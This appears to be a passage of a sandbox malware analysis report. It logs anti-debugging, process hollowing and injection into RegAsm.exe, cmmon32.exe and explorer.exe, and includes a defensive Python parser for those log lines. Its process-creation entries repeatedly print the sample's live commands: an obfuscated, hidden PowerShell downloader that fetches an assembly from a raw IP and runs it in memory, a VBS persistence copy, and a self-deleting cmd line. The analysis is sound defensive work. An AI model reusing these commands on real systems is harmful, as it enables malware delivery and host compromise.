Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04831074 mov eax, dword ptr fs:[00000030h] 23_2_04831074
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E3884 mov eax, dword ptr fs:[00000030h] 23_2_047E3884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E3884 mov eax, dword ptr fs:[00000030h] 23_2_047E3884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B171 mov eax, dword ptr fs:[00000030h] 23_2_0476B171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B171 mov eax, dword ptr fs:[00000030h] 23_2_0476B171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476C962 mov eax, dword ptr fs:[00000030h] 23_2_0476C962
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h] 23_2_048249A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h] 23_2_048249A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h] 23_2_048249A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h] 23_2_048249A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B944 mov eax, dword ptr fs:[00000030h] 23_2_0478B944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B944 mov eax, dword ptr fs:[00000030h] 23_2_0478B944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479513A mov eax, dword ptr fs:[00000030h] 23_2_0479513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479513A mov eax, dword ptr fs:[00000030h] 23_2_0479513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov eax, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov eax, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov eax, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov eax, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov ecx, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04769100 mov eax, dword ptr fs:[00000030h] 23_2_04769100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04769100 mov eax, dword ptr fs:[00000030h] 23_2_04769100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04769100 mov eax, dword ptr fs:[00000030h] 23_2_04769100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047F41E8 mov eax, dword ptr fs:[00000030h] 23_2_047F41E8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0476B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0476B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0476B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h] 23_2_047E51BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h] 23_2_047E51BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h] 23_2_047E51BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h] 23_2_047E51BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov eax, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov eax, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov eax, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A20 NtResumeThread,LdrInitializeThunk, 9_2_02BA9A20

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 3E0000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: unknown protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B14008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 106A008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread register set: target process: 684
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 684
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 2596
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 4996
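The injection evidence above is the raw material for a process-hollowing verdict: powershell.exe writes into RegAsm.exe at base 400000 with data that starts with 4D5A (an MZ header), RegAsm.exe unmaps a section in cmmon32.exe and maps execute/read/write sections into cmmon32.exe and explorer.exe, and both RegAsm.exe and cmmon32.exe queue APCs or set thread contexts in other processes. The Python triage helper below is an added example, not part of the sandbox report or the sample: it parses report lines of this shape into (source, target) pairs, collects an injection-indicator set per pair and names the targets whose image was unmapped or overwritten with a new PE. The sample lines are constructed from entries on this page (one keeps the report's "Jump to behavior" link text to show it being stripped); the indicator names and the verdict rule are the example's own, and numeric targets such as 684 are left unresolved because the report does not map them to image names.

```python
import re
from collections import defaultdict

# Image paths exactly as they appear in the report above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
CMMON = r"C:\Windows\SysWOW64\cmmon32.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample: a subset of the report's injection lines, in report format.
SAMPLE_LINES = [
    f"Source: {PS} Memory written: {REGASM} base: 400000 value starts with: 4D5A Jump to behavior",
    f"Source: {PS} Memory written: {REGASM} base: 401000",
    f"Source: {REGASM} Section unmapped: {CMMON} base address: 3E0000",
    f"Source: {REGASM} Section loaded: unknown target: {CMMON} protection: execute and read and write",
    f"Source: {CMMON} Section loaded: unknown target: {EXPLORER} protection: read write",
    f"Source: {REGASM} Thread APC queued: target process: {EXPLORER}",
    f"Source: {CMMON} Thread register set: target process: 684",
]

LINK_TEXT = " Jump to behavior"  # hyperlink label the HTML report appends to evidence lines

# One regex per evidence type the report emits; names match the wording on the page.
PATTERNS = [
    ("memwrite", re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<dst>.+?) base: "
                            r"(?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")),
    ("unmapped", re.compile(r"^Source: (?P<src>.+?) Section unmapped: (?P<dst>.+?) base address: (?P<base>[0-9A-Fa-f]+)$")),
    ("secload", re.compile(r"^Source: (?P<src>.+?) Section loaded: unknown target: (?P<dst>.+?) protection: (?P<prot>.+)$")),
    ("apc", re.compile(r"^Source: (?P<src>.+?) Thread APC queued: target process: (?P<dst>.+)$")),
    ("ctx", re.compile(r"^Source: (?P<src>.+?) Thread register set: target process: (?P<dst>.+)$")),
]


def summarize_injection(lines):
    """Map each (source, target) pair to the sorted list of injection indicators seen for it."""
    evidence = defaultdict(set)
    for line in lines:
        line = line.strip()
        if line.endswith(LINK_TEXT):
            line = line[: -len(LINK_TEXT)]
        for kind, pattern in PATTERNS:
            m = pattern.match(line)
            if not m:
                continue
            d = m.groupdict()
            key = (d["src"], d["dst"])
            if kind == "memwrite":
                evidence[key].add("cross_process_write")
                if (d.get("magic") or "").upper() == "4D5A":   # 'MZ': a PE image is being written
                    evidence[key].add("pe_header_written")
            elif kind == "unmapped":
                evidence[key].add("section_unmapped")           # original image discarded: hollowing
            elif kind == "secload":
                evidence[key].add("rwx_section_mapped" if "execute" in d["prot"] else "rw_section_mapped")
            elif kind == "apc":
                evidence[key].add("apc_queued")                 # execution trigger in the target
            elif kind == "ctx":
                evidence[key].add("thread_context_set")         # execution trigger in the target
            break
    return {key: sorted(inds) for key, inds in evidence.items()}


def hollowed_targets(summary):
    """Targets whose original image was unmapped or overwritten with a new PE by some source."""
    hits = {dst for (_, dst), inds in summary.items()
            if "section_unmapped" in inds or "pe_header_written" in inds}
    return sorted(hits)


if __name__ == "__main__":
    summary = summarize_injection(SAMPLE_LINES)
    for (src, dst), inds in summary.items():
        print(f"{src} -> {dst}: {', '.join(inds)}")
    print("hollowed:", hollowed_targets(summary))
```

The verdict rule is deliberately narrow: a cross-process write or an RWX mapping on its own is only "writes to foreign memory" and is produced by legitimate software too, whereas a section unmapped in another process, or a write that starts with an MZ header, is the step that distinguishes hollowing from ordinary injection. The execution triggers (APC, thread context) are recorded per pair so an analyst can see which process actually started the injected code.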
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
